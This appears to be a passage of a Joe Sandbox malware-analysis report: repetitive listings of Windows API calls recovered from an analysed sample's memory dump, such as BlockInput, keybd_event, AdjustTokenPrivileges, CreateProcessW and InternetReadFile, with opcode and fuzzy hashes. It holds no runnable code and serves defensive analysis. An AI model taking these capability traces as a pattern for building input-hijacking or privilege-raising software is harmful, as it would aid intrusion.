                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1423138444-0
                                                                                                                              • Opcode ID: 14098c8bf323b10cd7a4f2271263f4c4ba21aebcf6702edfd89b4d699e231ba5
                                                                                                                              • Instruction ID: 2d9f3eba88c0de9f62099c17c778cdf2c97a3eaeb9842f850136918886b87362
                                                                                                                              • Opcode Fuzzy Hash: 14098c8bf323b10cd7a4f2271263f4c4ba21aebcf6702edfd89b4d699e231ba5
                                                                                                                              • Instruction Fuzzy Hash: 6821D635500018EFDB158F54D898EFA7BBAFF49750F14406AF506873A2C3319E92DB90
                                                                                                                              APIs
                                                                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 001B221E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrlen
                                                                                                                              • String ID: ($|
                                                                                                                              • API String ID: 1659193697-1631851259
APIs
  • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
• NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 0018AE5E
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: DialogLongNtdllProc_Window
• String ID:
• API String ID: 2065330234-0
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,001C4A1E,00000000), ref: 001C55FD
• InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 001C5629
Similarity
• API ID: Internet$AvailableDataFileQueryRead
• String ID:
• API String ID: 599397726-0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 001BEA95
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 001BEAEF
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 001BEB3C
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
APIs
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001B704C
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 001B708D
• CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001B7098
Similarity
• API ID: CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 33631002-0
APIs
  • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
  • Part of subcall function 0018B155: GetWindowLongW.USER32(?,000000EB), ref: 0018B166
• GetParent.USER32(?), ref: 001EF4B5
• NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,0018ADDD,?,?,?,00000006,?), ref: 001EF52F
Similarity
• API ID: LongWindow$DialogNtdllParentProc_
• String ID:
• API String ID: 314495775-0
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 001BFD71
• FindClose.KERNEL32(00000000), ref: 001BFDA1
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
APIs
  • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
• NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,001EF352,?,?,?), ref: 001DF115
  • Part of subcall function 0018B155: GetWindowLongW.USER32(?,000000EB), ref: 0018B166
• SendMessageW.USER32(?,00000401,00000000,00000000), ref: 001DF0FB
Similarity
• API ID: LongWindow$DialogMessageNtdllProc_Send
• String ID:
• API String ID: 1273190321-0
                                                                                                                              APIs
                                                                                                                              • ClientToScreen.USER32(?,?), ref: 001DF47D
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,001EF42E,?,?,?,?,?), ref: 001DF4A6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClientDialogNtdllProc_Screen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3420055661-0
                                                                                                                              • Opcode ID: 866d8f8f1e33e2d2cf9ccc86cae216a25b2dc685ce6ad50a133b5d0aaa635978
                                                                                                                              • Instruction ID: 1457021453108e9745426c7b761ac8d28b40bb5a23643e7857ae6a62aa3bb4d5
                                                                                                                              • Opcode Fuzzy Hash: 866d8f8f1e33e2d2cf9ccc86cae216a25b2dc685ce6ad50a133b5d0aaa635978
                                                                                                                              • Instruction Fuzzy Hash: 68F05E72400118FFEF049F95EC099BEBFB9FF44351F14401AF902A2160D7B5AA51EB60
                                                                                                                              APIs
                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,001CC2E2,?,?,00000000,?), ref: 001BD73F
                                                                                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,001CC2E2,?,?,00000000,?), ref: 001BD751
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorFormatLastMessage
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3479602957-0
                                                                                                                              • Opcode ID: 31e84c6f46b5adeed7269265df666fb01d3b305b5cbae821d9c2fa9e0d3d48c5
                                                                                                                              • Instruction ID: c770f819db9b6663c8e33d9417d29a3c121594558568884f0338773e5342041c
                                                                                                                              • Opcode Fuzzy Hash: 31e84c6f46b5adeed7269265df666fb01d3b305b5cbae821d9c2fa9e0d3d48c5
                                                                                                                              • Instruction Fuzzy Hash: 74F08C3510032DABDB21AFA4DC49FEA776DBF49365F008155F909D6181E7309A80CFA0
                                                                                                                              APIs
                                                                                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 001B4B89
                                                                                                                              • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 001B4B9C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InputSendkeybd_event
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3536248340-0
                                                                                                                              • Opcode ID: 829a31c179a33dd827efd75d368861ff08fcc57da7db6d9bfb1a25312ea80a8b
                                                                                                                              • Instruction ID: 0f31956a9ed0601bbbb3409b518ab9a703d1f38c04de9cd283f4b55c86e3bb3a
                                                                                                                              • Opcode Fuzzy Hash: 829a31c179a33dd827efd75d368861ff08fcc57da7db6d9bfb1a25312ea80a8b
                                                                                                                              • Instruction Fuzzy Hash: C0F06D7080424DAFDB058FA0C805BBE7BB4AF00305F00C409F951A51A2D779C616DF90
                                                                                                                              APIs
                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 001AB8C5
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 001AB8D7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 81990902-0
                                                                                                                              • Opcode ID: 3c861dcc3cf0ff61f5b814439cb1a1cb435b9ba2b89ff95d5bc0a411b93bfd9c
                                                                                                                              • Instruction ID: da813ab522add1ac20b1cff64621c24116577f057ca38a6840d3365074323eef
                                                                                                                              • Opcode Fuzzy Hash: 3c861dcc3cf0ff61f5b814439cb1a1cb435b9ba2b89ff95d5bc0a411b93bfd9c
                                                                                                                              • Instruction Fuzzy Hash: CEE0EC72004611EFEB262B64FC09D777BEEEF08311B108869F49681870DB62ACD1DB10
                                                                                                                              APIs
                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 001DF59C
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,001EF3AD,?,?,?,?), ref: 001DF5C6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DialogLongNtdllProc_Window
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2065330234-0
                                                                                                                              • Opcode ID: 53429eca3edfbbb8e9eff86990b309bd1b3f53908ba6d2a56fab13abe23b89a5
                                                                                                                              • Instruction ID: 1bdace55c3f665a8e1a52ae308ba2da4075aa95edec28611d23c521ff60ff992
                                                                                                                              • Opcode Fuzzy Hash: 53429eca3edfbbb8e9eff86990b309bd1b3f53908ba6d2a56fab13abe23b89a5
                                                                                                                              • Instruction Fuzzy Hash: A7E0CD70104218BBEB140F09FC09F793B15F700750F10851AF917C80E0D7B095E1E660
                                                                                                                              APIs
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,0017125D,00197A43,00170F35,?,?,00000001), ref: 00198E41
                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00198E4A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3192549508-0
                                                                                                                              • Opcode ID: 2bbb27d9f6728bebf378dc715cad281b13395683be77185fa2051628b603674d
                                                                                                                              • Instruction ID: 8abb01cd625fd04c7030095f5ecc94b88b3825d95df51a5a09aee833d7053d2a
                                                                                                                              • Opcode Fuzzy Hash: 2bbb27d9f6728bebf378dc715cad281b13395683be77185fa2051628b603674d
                                                                                                                              • Instruction Fuzzy Hash: EAB092B1048A08ABEB002BA1FC09BB83F6AFB08A62F014010F71D448608B635490CA92
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7a0ea1672c947e7d2f69b2f5884e7fbe4cb9d8b509fa1022d8838a95ed80eaf0
                                                                                                                              • Instruction ID: 5e880fdf3779dc36a23199938a395a25ac906b884635c6e458e2f648ab1311d5
                                                                                                                              • Opcode Fuzzy Hash: 7a0ea1672c947e7d2f69b2f5884e7fbe4cb9d8b509fa1022d8838a95ed80eaf0
                                                                                                                              • Instruction Fuzzy Hash: 5CB10220D2AF504DD7239639983933BB65DAFBB2C5F91D71BFC2A70D22EB2185834580
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 001E0352
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DialogLongNtdllProc_Window
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018B155: GetWindowLongW.USER32(?,000000EB), ref: 0018B166
                                                                                                                              • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 001DE7AF
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$CallLongProc
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
                                                                                                                                • Part of subcall function 0018B736: GetCursorPos.USER32(000000FF), ref: 0018B749
                                                                                                                                • Part of subcall function 0018B736: ScreenToClient.USER32(00000000,000000FF), ref: 0018B766
                                                                                                                                • Part of subcall function 0018B736: GetAsyncKeyState.USER32(00000001), ref: 0018B78B
                                                                                                                                • Part of subcall function 0018B736: GetAsyncKeyState.USER32(00000002), ref: 0018B799
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,001EF417,?,?,?,?,?,00000001,?), ref: 001DEA9C
                                                                                                                              Similarity
                                                                                                                              • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,0018AF40,?,?,?,?,?), ref: 0018B83B
                                                                                                                              Similarity
                                                                                                                              • API ID: DialogLongNtdllProc_Window
                                                                                                                              APIs
                                                                                                                              • BlockInput.USER32(00000001), ref: 001C7057
                                                                                                                              Similarity
                                                                                                                              • API ID: BlockInput
                                                                                                                              APIs
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 001DF41A
                                                                                                                              Similarity
                                                                                                                              • API ID: DialogNtdllProc_
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 0018ACC7
                                                                                                                              Similarity
                                                                                                                              • API ID: DialogLongNtdllProc_Window
                                                                                                                              APIs
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,001EF3D4,?,?,?,?,?,?), ref: 001DF450
                                                                                                                                • Part of subcall function 001DE13E: _memset.LIBCMT ref: 001DE14D
                                                                                                                                • Part of subcall function 001DE13E: _memset.LIBCMT ref: 001DE15C
                                                                                                                                • Part of subcall function 001DE13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00233EE0,00233F24), ref: 001DE18B
                                                                                                                                • Part of subcall function 001DE13E: CloseHandle.KERNEL32 ref: 001DE19D
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2364484715-0
                                                                                                                              • Opcode ID: 9ebf4816618414220135fbe32a2326a74503265fce9eec98fe335a0cf1ce259f
                                                                                                                              • Instruction ID: e84a9f19d31792990721ce83ecc4fcbe0f9407295b7abd54cb43958ec71afeeb
                                                                                                                              • Opcode Fuzzy Hash: 9ebf4816618414220135fbe32a2326a74503265fce9eec98fe335a0cf1ce259f
                                                                                                                              • Instruction Fuzzy Hash: B8E09231210209DFCB11AF58EC49EAA37A6FB08351F018056FA055B6B1C771A961EF55
                                                                                                                              APIs
                                                                                                                              • NtdllDialogWndProc_W.NTDLL ref: 001DF3A1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DialogNtdllProc_
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3239928679-0
                                                                                                                              • Opcode ID: 133ac36d8026a42f7f24c1eda202ab6a7da0899d3ee8c1fad444afc0a72a55e4
                                                                                                                              • Instruction ID: a3433a6422b8a678fecf65ee3b8afaab72c08c54d3272f2dacaf721b168a5e50
                                                                                                                              • Opcode Fuzzy Hash: 133ac36d8026a42f7f24c1eda202ab6a7da0899d3ee8c1fad444afc0a72a55e4
                                                                                                                              • Instruction Fuzzy Hash: 9DE0E27420420CEFDB01DF88E848E963BA5FB1A350F000054FD048B261C771A830EB61
                                                                                                                              APIs
                                                                                                                              • NtdllDialogWndProc_W.NTDLL ref: 001DF3D0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DialogNtdllProc_
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3239928679-0
                                                                                                                              • Opcode ID: 6afcc53c44a7bb3669096ce04480b8a7237d94af7dd196f28af565ed3eb621fc
                                                                                                                              • Instruction ID: 48d5ceb640a7196582b0deaa9a6e20ecc7c8821c3fddace6ea1b14ff3e9bf89b
                                                                                                                              • Opcode Fuzzy Hash: 6afcc53c44a7bb3669096ce04480b8a7237d94af7dd196f28af565ed3eb621fc
                                                                                                                              • Instruction Fuzzy Hash: 5AE0E27420020CEFDB01DF88E848E963BA5FB1A350F000054FD048B262C772A870EBA1
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0018AF8E
                                                                                                                                • Part of subcall function 0018B86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0018B85B), ref: 0018B926
                                                                                                                                • Part of subcall function 0018B86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,0018B85B,00000000,?,?,0018AF1E,?,?), ref: 0018B9BD
                                                                                                                              • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,0018AF1E,?,?), ref: 0018B864
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
